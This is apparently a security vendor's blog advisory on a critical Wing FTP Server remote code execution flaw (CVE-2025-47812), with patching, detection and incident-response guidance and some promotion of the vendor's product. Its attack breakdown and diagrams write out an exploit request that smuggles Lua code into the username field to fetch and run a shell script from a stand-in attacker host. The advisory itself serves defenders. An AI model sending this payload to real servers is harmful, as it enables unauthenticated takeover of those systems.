CVE-2025-47812: Wing FTP Server Remote Code Execution Vulnerability (Null Byte Injection)
Published July 12, 2025 | CVSS Score: 10.0 (Critical)
CVE-2025-47812 is a critical vulnerability affecting Wing FTP Server versions prior to 7.4.4. This severe security flaw enables unauthenticated attackers to execute arbitrary code remotely (RCE) by exploiting inadequate validation of input containing null bytes (%00) in the authentication process
When attackers inject a null byte into the username parameter, Wing FTP Server’s string handling functions prematurely terminate string processing, bypassing authentication controls while preserving malicious Lua code. This code is then executed with elevated privileges (root/SYSTEM), allowing full compromise. (Arctic Wolf, 2025; Help Net Security, 2025).
The exploit was publicly disclosed on June 30, 2025, and active exploitation first detected on July 1, 2025 (The Hacker News, 2025).
Technical Attack Breakdown
A typical exploit request involves an HTTP POST containing the null-byte payload:
POST /loginok.html HTTP/1.1
Host: vulnerable-server.com
username=anon%00print(os.execute("curl -s http://attacker.com/shell.sh | bash"))
How the exploit works:
- The %00 null byte prematurely terminates the username string during authentication.
- The complete malicious input is stored verbatim into a session file.
- Wing FTP executes this session file as a Lua script, granting attackers root-level shell access.
┌───────────────────┐ ┌──────────────────┐
│ │ 1. HTTP POST │ │
│ Attacker │ ─────────────────▶ Wing FTP │
│ │ with %00 payload│ Server │
└───────────────────┘ └──────────────────┘
│
│ 2. Authentication Check
▼
┌─────────────────────────────────────────────────────────────────┐
│ │
│ username=anon%00print(os.execute("curl attacker.com/shell.sh | │
│ bash")) │
│ │
│ ◀─────────────┬───────────────────────────────▶ │
│ Processed │ Ignored during auth check │
│ as "anon" │ but stored completely │
└─────────────────────────────────────────────────────────────────┘
│
│ 3. Creates Session File
▼
┌─────────────────────────────────────────────────────────────────┐
│ /Session/sess_[ID].lua │
│ │
│ -- Session data │
│ username="anon │
│ print(os.execute("curl attacker.com/shell.sh | bash"))" │
│ │
└─────────────────────────────────────────────────────────────────┘
│
│ 4. Executes as Lua Script
▼
┌─────────────────────────────────────────────────────────────────┐
│ │
│ Server executes script with SYSTEM/root privileges │
│ │
│ ┌───────────────────────────────┐ │
│ │ print(os.execute("curl │ ──▶ Retrieves & executes │
│ │ attacker.com/shell.sh | bash"))│ malicious shell script │
│ └───────────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────┘
│
│ 5. Attacker Gains Control
▼
┌───────────────────┐ ┌──────────────────┐
│ │ 6. Remote Shell │ │
│ Attacker │ ◀───────────────── Compromised │
│ │ with root/SYSTEM│ Server │
└───────────────────┘ └──────────────────┘The core vulnerability emerges from a fundamental disparity in how different parts of Wing FTP Server process the same input string:
User Input: anonymous%00malicious_lua_code
| |
V V
Authentication Session Storage
Sees: Stores:
"anonymous" "anonymous\0malicious_lua_code"
| |
V V
PASS EXECUTEAffected Systems
- Wing FTP Server versions earlier than 7.4.4.
- Approximately 5,000 internet-facing Wing FTP Server instances are currently vulnerable to this vulnerability (The Hacker News, 2025).
Recommended Actions for Application Security Teams
Priority 1:
- Immediately upgrade Wing FTP servers to version 7.4.4 or newer.
- If immediate patching is not feasible, temporarily restrict access to /loginok.html using firewall or WAF rules.
Priority 2:
- Audit software inventories and Software Bill of Materials (SBOMs) to identify all deployments or embedded instances of Wing FTP.
- Examine server logs urgently for %00 patterns and suspicious session file creation under /Session/.
Priority 3:
- Disable anonymous FTP accounts immediately.
- Rotate all FTP-related credentials.
- Limit administrative interface access to internal networks or VPN only.
Incident Response Guidelines for SOC/IR Teams
- Containment:
- Isolate affected hosts immediately.
- Create forensic snapshots of memory and disk, preserving session files under /Session.
- Isolate affected hosts immediately.
- Investigation:
- Inspect logs for outbound requests (curl, wget, PowerShell) and unauthorized file or user account creation or modification.
- Inspect logs for outbound requests (curl, wget, PowerShell) and unauthorized file or user account creation or modification.
- Eradication and Recovery:
- Rebuild affected servers from trusted images with Wing FTP version 7.4.4 or later.
- Rotate credentials stored on compromised systems.
- Rebuild affected servers from trusted images with Wing FTP version 7.4.4 or later.
- Post-Incident Recommendations:
- Implement monitoring rules targeting Lua script execution and HTTP requests containing %00.
- Conduct a post-mortem and update security training regarding vulnerabilities related to null byte injections.
- Implement monitoring rules targeting Lua script execution and HTTP requests containing %00.
How Kodem Protects Customers
- Kodem SCA customers were instantly able to identify (a) where the vulnerable Wing FTP package was installed, (b) where it was actively running in production, and (c) which instances were reachable and exploitable by attackers. Kodem promptly detected exploit activity, mitigated the immediate threat until patches were deployed, and continued monitoring for future exploitation attempts.
- Kodem’s runtime detection capability -leveraging eBPF and memory analysis - immediately identified attacker-triggered Lua executions within Wing FTP Server processes, without requiring an agent on the vulnerable server.
- Kodem automatically constructed an attack-chain visualization correlating malicious HTTP requests, Lua executions, and resulting command shells. Initial exploitation attempts were detected by Kodem customers on July 1st, 2025, preceding widespread public advisories.
Key Lessons for Security Teams
- Static analysis and SBOMs list installed components but do not reflect runtime vulnerabilities and attacks.
- The time between vulnerability disclosure and active exploitation has shortened significantly, often to mere hours, emphasizing the importance of rapid incident response.
- Runtime monitoring provides essential context, converting vulnerability data into actionable intelligence. Static vulnerability listings alone are insufficient.
In short: “Static findings suggest vulnerabilities. Runtime reveals exploitation.”
References
Arctic Wolf. (2025, July 10). CVE-2025-47812: Wing FTP Server remote code execution vulnerability exploited in the wild. Retrieved from https://arcticwolf.com/resources/blog-uk/cve-2025-47812-wing-ftp-server-remote-code-execution-vulnerability-exploited-in-the-wild/
Help Net Security. (2025, July 11). Critical Wing FTP Server vulnerability exploited in the wild (CVE-2025-47812). Retrieved from https://www.helpnetsecurity.com/2025/07/11/critical-wing-ftp-server-vulnerability-exploited-in-the-wild-cve-2025-47812/
The Hacker News. (2025, July 11). Critical Wing FTP Server vulnerability actively being exploited. Retrieved from https://thehackernews.com/2025/07/critical-wing-ftp-server-vulnerability.html
More blogs
Kai Gets Internet Access: Turning Context Into Intelligence for Product Security Teams
For years, product security teams have lived with a gap. Tools surfaced findings — CVEs, outdated packages, risky dependencies — but rarely the context to make sense of them. Engineers still had to open a browser, type a CVE into Google, skim through NVD, vendor advisories, GitHub issues, and random blogs to answer basic questions: Is this actually exploitable in our environment? Is there a safe upgrade path? Has anyone seen this exploited in the wild? This release closes that gap.
When NPM Goes Rogue: The @ctrl/tinycolor Supply-Chain Attack
On September 15, 2025, researchers at StepSecurity and Socket disclosed a large, sophisticated supply-chain compromise in the NPM ecosystem. The incident centers around the popular package @ctrl/tinycolor (with over two million weekly downloads), but it extends far beyond: 40+ other packages across multiple maintainers were also compromised.
Malicious Packages Alert: The Qix npm Supply-Chain Attack: Lessons for the Ecosystem
The npm ecosystem is in the middle of a major supply-chain compromise. The maintainer known as Qix is currently targeted in a phishing campaign that allows attackers to bypass two-factor authentication and take over their npm account. This is happening right now, and malicious versions of widely used libraries are being published and distributed.
A Primer on Runtime Intelligence
See how Kodem's cutting-edge sensor technology revolutionizes application monitoring at the kernel level.
Platform Overview Video
Watch our short platform overview video to see how Kodem discovers real security risks in your code at runtime.
The State of the Application Security Workflow
This report aims to equip readers with actionable insights that can help future-proof their security programs. Kodem, the publisher of this report, purpose built a platform that bridges these gaps by unifying shift-left strategies with runtime monitoring and protection.
.png)
Get real-time insights across the full stack…code, containers, OS, and memory
Watch how Kodem’s runtime security platform detects and blocks attacks before they cause damage. No guesswork. Just precise, automated protection.
Stay up-to-date on Audit Nexus
A curated resource for the many updates to cybersecurity and AI risk regulations, frameworks, and standards.